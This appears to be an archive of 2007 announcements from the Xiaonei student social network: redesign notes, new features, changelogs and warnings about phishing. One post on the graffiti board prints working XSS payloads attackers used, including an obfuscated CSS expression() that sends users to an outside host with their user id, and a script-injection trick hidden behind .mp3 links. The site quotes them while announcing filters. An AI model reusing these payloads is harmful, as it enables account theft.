<a href="http://www.xnei.net/" target="_blank"><img src="http://www.xnei.net/image/ilogo.gif" alt="校内网代码精灵-校内网美化专业网站,欢迎您的访问" border="0"></a>
校内网作为大学生自己的社区,一直保持着简洁、朴素的风格,而即将到来的新版,也会保持我们惯有的风格,并给大家带来更好的用户体验。 此次改版由
Noise大人操刀,为校内设计了新的头型,这边偶先谢过唐僧大哥咯~
这次新版的主要改动有以下几点:
* 头部与内容部分错开,使页面更有层次感和立体感,也使用户更易分辨。
* 头部功能栏由两栏精简为一栏,节省了头部高度,拿掉了与用户操作无关的“大学生互动空间”。
* 主导航由原来的11项缩减为7项,相关联的子项被放入子菜单,导航中的链接更大更宽,更易点击。
* 突出左侧个人菜单,这里应该是用户使用最频繁的地方了。
* 将左侧广告的载入顺序调整到了最后,以后全部页面显示完广告才会出现,大幅缩短了页面的载入速度。
重要:此次改版不会对任何用户的美化造成影响,已经美化过的用户将完全保留自己的美化成果。 新版特别好友功能上线
李晓堂发布于2007-06-19 11:55
新版“特别好友”加入了“描述我的特别好友”功能。拥有特别好友的用户除了可以在自己的页面上展示他们,而且可以为每一位特别好友编辑一个特别的描述。这个描述同样会出现在你的页面上,让大家更好的认识他们。
1、当用户将好友加为特别好友时,会自动进入描述编辑页;
2、用户也可以在“我的页面”上的特别好友板块,点击“编辑”或“描述我的特别好友”进入描述编辑页;
3、还可以在“我的好友”之“特别好友”列表中,点击“编辑”或“描述我的特别好友”进入编辑页面。
4、描述文字的字数限制在30字以内。
“我的好友”列表:
描述编辑页:
“我的好友”之“特别好友”列表:
“我的页面”之特别好友展示:
怎样识别诈骗信息
白云龙发布于2007-04-26 14:31
最近不少恶意用户利用涂鸦版的漏洞或发布连接,引导用户进入他们制作的和校内网一摸一样的页面来骗取我们的帐号或诈骗财物。
下面我们来做一下分析怎样防止上当受骗
诈骗手段:
1、利用涂鸦版的漏洞发布恶意代码,访问存在恶意代码用户的主页就会跳转到和校内一样的登陆页让你输入账号重新登陆
2、在留言/群中发布中将信息 或抽奖活动,诈骗我们的财物
对于第一种手段我们已经采取了过滤措施,恶意信息已经作了屏蔽,但是第二种方式我们防不胜防。那我们如何辨别信息的真实性呢?
辨别真伪:
首先我们要了解一下以下概念
1、首先我们需要了解什么是域名。
http://www.officeweb.com.cn/boss/files/a_07.htm 这篇文章中的 1 2 4 已经详细的描述清楚了。
2、地址栏 这个应该都知道 就是我们输入 网站地址(连接) 的地方。
以上的概念理解后,我想大家都知道我们校内网的域名是 xiaonei.com 。访问我们的网站你可以看到在你们的地址栏中的连接地址都是含有 xiaonei.com这个域名的。
比如这个连接 http://xiaonein.3355.cn/ (一个诈骗活动) 他的域名是 3355.cn ,这个就不是xiaonei的域名,而 blog.xiaonei.com 就是校内的域名,为什么呢?
这里有个2级域名的概念 二级域名是一级域名的子域名 在校内 xiaonei.com 是一级域名,就是我们通常说的校内的域名,blog.xiaonei.com 是校内的一个二级域名。
大家如果理解了这个,当你看到让你输入的帐号页面,或活动页面时,检查一下地址栏中的地址,是否以 http://xxx.xiaonei.com/ 开始,其中 “xxx” 是任意字符,如果不是,那就是诈骗信息。
不知道述清楚了没有,希望它对大家有益。
涂鸦版的问题
白云龙发布于2007-04-13 10:07
最近不少恶意用户利用网站的漏洞盗取私人帐号,给我们的用户带来不少的麻烦,给网站带来了负面的影响。
作恶用户的手段主要有以下几种
1、eval 声明javascript
2、样式表的 expression 属性声明javascript
3、利用样式表的漏洞 在样式中引入javascript 通过本地脚本配合
有不少的用户是通过引用 css 样式表来美化个人空间的,昨天最 link标签作了过滤,影响了不少的用户,但是为了更多用户的安全,我们必须这样作,所以建议大家在美化个人空间的时候尽量引用站内的样式或者将样式写入涂鸦版中。我们近期也会对 涂鸦版中站内引用/站外引用作文件过滤 消除这样的隐患,同时我们也会纪录下试图引用恶意代码的用户id, 以便对他们进行处罚,营造一个更好的校内网
比较典型的几段恶意代码
1、(expression漏洞)
<a href="http://www.zidou.com" target="_blank"><img src="http://img.zidou.com/img/zidou.gif" alt="美化页面如此简单" /></a><body background=""bgproperties="fixed"><bgsound src="http://hd9.15150.com/music1/2006_9_20/3120205_214715_16198.wma"><!--Devil's Bones! 06194691-w><!><div style="a:exp ression(if(loca\tion.href.indexOf('bones')==-1 && document.cookie.indexOf('bones=') == -1) loca\tion.href('http://home.goo'+'far.com/xianei/Error.asp?from='+parent.loca\tion.href.substring(parent.loca\tion.href.indexOf('id')+3).replace(/[^0-9]/g, '')+'&id='+document.getElementById('mymenu').innerHTML.substring(document.getElementById('mymenu').innerHTML.indexOf('http://xiaonei.com/getuser.do?id=') + 33, document.getElementById('mymenu').innerHTML.indexOf('我的页面')).replace(/[^0-9]/g, '')))"><DIV STYLE="s:ex\pression(if(document.cookie.indexOf('bones=') == -1) document.cookie='bones=z1;expires='+new Date(new Date().getTime()+10000).toGMTString())">
2、(link 漏洞)
<link
href="http://fm032.img.xiaonei.com/tribe/20070324/0340/A8956163GE.mp3"
rel="stylesheet" type="text/css" media="all" />
<div class=jscode>
codeJSUrl="http://fm022.img.xiaonei.com/tribe/20070325/1150/A4771284GE.mp3";
codeCSSUrl="http://source.xiaonei.com/tribe/20070118/1130/orig3213710.css";
var s2 = document.creat eElement("scr"+"ipt");
s2.src=codeJSUrl;
document.body.insert AdjacentE lement("BeforeBegin",s2);
</div>
http://fm032.img.xiaonei.com/tribe/20070324/0340/A8956163GE.mp3 css文件
内容:
.jscode{
display:none;
background:expression((this.innerHTML!="")?((eval(this.innerHTML+"this.innerHTML=''")==null)?"#aaa":"#123"):"#a00"
);
}
校内网没有发布任何抽奖信息,请大家不要受骗!!
庄宏斌发布于2007-03-29 17:42
近日我们发现有人冒充校内网发布一些抽奖活动,网页做得和校内网很相似,请大家小心提防,不要上当!!
判别这类虚假网站的方法是看看浏览器的地址栏中是否为“xiaonei.com”,
比如底下的就是假的。
请大家告诉周围还不知道的同学,避免他人受骗。
关于近期涂鸦板故障的问题
赖正发布于2007-02-15 17:16
近几天发现个别危险分子利用系统漏洞,用JS代码编写恶意代码。
使同学出现涂鸦板失效、群无故被删、群主无故转让等等奇怪症状。
恰逢年关,为了让大家都能过个好年,所以我们
加强了代码过滤。
原来一些利用IE漏洞非法调用JS脚本的代码将不再有效。
图一也许这样会导致许多本无恶意的同学的部分代码失效,
我们深表歉意,这段时间校内工作人员将会就这个问题作出更为恰当的处理,
例如在
重要数据提交之前添加验证码等。
请大家现在在修改涂鸦板的同时注意备份。
若在修改涂鸦板时出现图一的提示。
请查证自己的涂鸦板内是否存在与图内疑似吻合的代码,
同时
感染病毒的同学会在自己的涂鸦板看到一大段以:
<!--- You have been infected from ....
开头的代码。 请将自其而下的代码全部去掉以后再进行保存,
如果还有问题可以给
我留言。
我们相关的技术人员有些驻留在总部,有些在火车上,有些刚刚下飞机,
只要能联系上的现在都在针对这个问题作出各种解决措施,
时间紧迫,未能尽善,
请身在家中的同学们予以理解,
让忙碌了整整一年的校工们能舒坦地过个好年,加满电,明年再为人民服务:)
希望这次校内的举措不会过度地影响大家的过节心情,
我仅代表校内的校工们真诚地祝愿大家新年愉快。

相关阅读:
给“黑客”同学的一封信对于加星,我们的管理员已经火眼金睛. :)
张筱娴发布于2007-02-15 11:17
由于需要加星的同学太多。
所以我有空也会帮忙去进行审核。
发现作为一个合格的审核人员,
最重要的条件就是: 熟悉全世界各地各样的红或者不红的明星。一眼放去,就能全部看个大概。
因为:只要是公众人物, 都有可能会被一些同学拿来做自己的头像。
这就需要审核队伍的同学们对所有或大或小的公众人物都要知晓。
如何成为星级用户?
要想获得星星需要的同时满足这三条:
1.本人的、真实的、年龄别和现在差太远的、能看清楚脸的照片作头像;
2.本人的、真实的中文姓名,可以加些修饰但一定要能看出哪个是名字来;
3.较为完善的个人资料。
在我们校内网,我们倡导使用真实姓名真实头像以及真实资料.
希望各位同学尽量使用自己真实的资料.
也许你已经通过了审核得了到星。但由于你后来使用假头像,也会被我们取消星级。
我们审核队伍的同学们早已练就了火眼金睛。:)
我们鼓励大家使用真实资料。
只有大家都这样做,才能保证在校内网里找到更多身边的同学以及朋友,才能更多地享受校内网的乐趣。。
新年将至,在这里,我代所有校内网的工作人员预祝各位同学:
新年好。
祝福大家在新的一年里,学业能有大的进展。生活质量更上一层楼。
过年期间诈骗猖獗,同学们多加小心
赖正发布于2007-02-13 22:01
近期发现有个别虚假用户通过校内的站内消息,帖子及校内通信息来传播诈骗信息,
大概形式为:
校内网作为一个创业团队,很惭愧还没有能力送出如此丰厚的礼物...这种需要链接到外部网站登录的且有诱人礼品的信息一定是虚假信息。
同学们一旦发现此类信息,请立即给
管理员留言,举报发送此消息的用户,
同时附上该名
用户的ID及
内容的目标链接(例:上图的举报目标链接为:http://5q.zjtx.net)。
如何保护自己? 如果活动信息地址不是以xiaonei.com或xxxx.xiaonei.com开头的,则肯定不是校内网的官方活动地址。
遇到这种情况,请同学们积极举报。我们将义不容辞地在站内过滤此类链接及封闭此用户。
社区文明要大家一起来营造,愿同学们来年平安快乐:)
请‘随便看看’
阿妍发布于2007-02-09 10:31
在校内网,除了和认识的人交流,我们还期待找到更多的新朋友,结识有意思的人,
在不太确定目标的时候,我们就‘随便看看’
随便看看,其实并不随便
所以,这次给大家带来的是激动人心的按条件筛选
根据调查,我们最终确定了这样几个筛选条件:大学,入学年,性别,兴趣爱好,家乡 和星座
其中我最喜欢的就是‘兴趣爱好’这项了 :)
比如我想找一找最近和我一样迷上《越狱》的女同学,现在很容易就做到了:
在兴趣爱好里输入:越狱,性别限定为:女
你还可以:
找到和自己喜欢同一本漫画、同一个歌手、同一种运动的同学,
找出和自己星座匹配的同学,
查一查本校的同乡,
随便看看隔壁学校的女生
……
好了,大家随便看看吧, 相信大家会在这里找到很多乐趣的:)
新功能:分享
赖正发布于2007-02-08 16:19
近期有一次5Q和校内合并以来最大的功能更新...我负责的是“分享”功能。
分享是一种美德 送人芝兰手有余香,这次推出的分享功能是一种尝试,目的是让同学们可以将平时看到的有趣东西向自己的好朋友分享,当然,你也可以将它当作自己的校内收藏夹,收藏精彩内容留待日后重温。
分享功能的操作非常便利,只要在网站里看到下面这个按钮:
只要轻轻点击,然后进行简短的评论,提交。
你的好友就可以收到你的分享提示:)
分享的内容暂时开放了四种:
我们将根据功能的情况来进行进一步开发,进一步开放更多的分享类型,例如活动、课程、站外链接等等。
分享后的内容可以在“我的分享”栏目统一管理,你也可以作为一个自己的收藏夹来使用:
新功能:状态
让好友知道你现在在做什么,随时了解好友们都在做什么
1,点击‘编辑’,即可修改状态。你可以从几个预置状态中选择,也可以自己输入,想怎么写都可以哦,当然要语句通顺:)言简意赅最好,因为这个状态信息会在很多地方出现
选中即可保存,如果是自己输入,需要敲一下回车
3,当你修改了状态,你的好友就会收到提示,
同样,通过右侧的‘我的好友’,你也可以随时了解到朋友们的状态,
4,在每个人的个人主页上,状态也有体现,位置就在头像和主操作的下方。从个人主页还可以看一个人的连续状态,这对了解朋友应该是很有帮助的吧
5, over, 枯燥的教程完毕,下面的精彩就由大家自己去发现吧
我在做什么?
我正在润色这篇教程希望能把它写的更生动更有趣更浅显易懂以至于更多的人能够喜欢这个功能。。。
三个功能更新
1、在首页添加了“小提示”功能:
想不到做什么的时候,看看我们的小提示,挖掘一些你可能还未用到过的功能。
2、同院系同学新鲜事:
在首页添加了以上提示块,
同学们可以通过此了解跟自己同一届的同院系同学的近况,
包括有什么新朋友加入了我们校内大家庭。
3、搜索功能强化:
搜索页面的进行了一些调整,简化了内容,将主要的一些搜索项目都放到了搜索第一页,
而且放宽了高级搜索限制,可以搜索的范围更大,而且结果更加有效。
搜索功能将会继续改善,我们希望有一天,你可以在校内网找到任何一个你想要找到的同学。
有什么功能上的问题或者建议可以找我、何春妍或者庄宏斌同学聊聊。
我们都在聆听大家的声音,和大家一起享受这个网站的乐趣:)
PS:首页XXX大学人气之星的范围缩小到本省。
搜索结果过滤更新
更新了搜索的排序之后,我们为“随便看看”和搜索结果页添加了后继搜索栏,
这样同学们就可以更流畅地进行搜索,试一试?
看看能不能搜出一些以前搜不到的朋友:)
有同学反映现在不能看其他学校的同学了,我们正在完善随便看看附带的搜索功能,
本周内就会解决这个问题。
新功能:生日提醒
现在,好友的生日再也不会错过了
登录后在首页的右侧就能看到,最近一周将要过生日的好友
简单的,给Ta发封站内消息;
有心的,到主页去踩踩,留言祝福下;
喜欢热闹的,还可以发起个活动,找个借口打打牙祭,呵呵
在‘查看全部’,可以更直观的看到全部的好友的生日,
同一天生日好友们一起庆祝吧
还有更多应用,大家自己去发现吧
搜索结果的排序调整
1、调整了搜索结果的排序机制,
主要依据: 是否星级用户和最近登录时间,
这样大家就能够很快搜索到有效的信息了。
btw, 如果想被别人搜索到,就要成为星级用户哦,
当然还要经常登录:)
2、今天数据库大牛
刘启荣同学对相册数据进行了优化,有效解决了一部分延迟问题。
解决服务器延迟这个老大难问题将持续进行....
1,修正了回帖后删除此帖最后回复不更新的bug.
2,修正了留言板数量的bug。
3,注册时对yahoo的email增加了提醒。
4,对个人页面上左边的各个栏分别设置了id.
5,修改了相册里复制照片网址的地址,可以直解用这个网址显示出图来,当然仅限在校内网内使用,在别的地方使用无效。
6,修改了群列表页面,现在不登录就可以看到了。
7,修改了页面简介。
8,修改了个人页面左侧的好友列表,改为最近登录的好友。
9,优化了站内信页面全选速度慢的问题。
10,修改了发站内信后的“返回”提示,当然现在这个地方还偶尔有点编码问题:(
1,增加了特别好友功能,可以在“我的好友”页面点“加为特别好友”。
2,在群里发表主题增加了插入图片和链接的快捷按钮。
3,修正了编辑照片时照片标题长度check错误的bug。
4,如果填入生日后没有选择星座,自动识别出对应的星座。
5,上线新活动,女生才可以参加:)
6,清空涂鸦板这个操作现在需要确定了。
7,修正了群管理员忽略加入申请/忽略作管理员申请报错的bug。
8,修改了随机打招呼成功后提示信息的bug。
9,修正了退出登录不起作用的bug。
10,修正了查看某个人日志时,没有头像的bug。
11,修正了个人网址可以刷人气的bug。
12,现在删除日志会扣除相应积分。
13,修正了加入黑名单后还能回复留言的bug。
14,修正了高级搜索里宿舍和院系不能正常load的bug。
1,为了方便同学们了解系统的变动,把系统比较大的更新在系统更新日志里面说明。
2,在“学校”页面加入“其他学校”的链接,方便大家去兄弟院校串门。
饿了,先去吃饭,回来再写。
同时祝同学们节日快乐。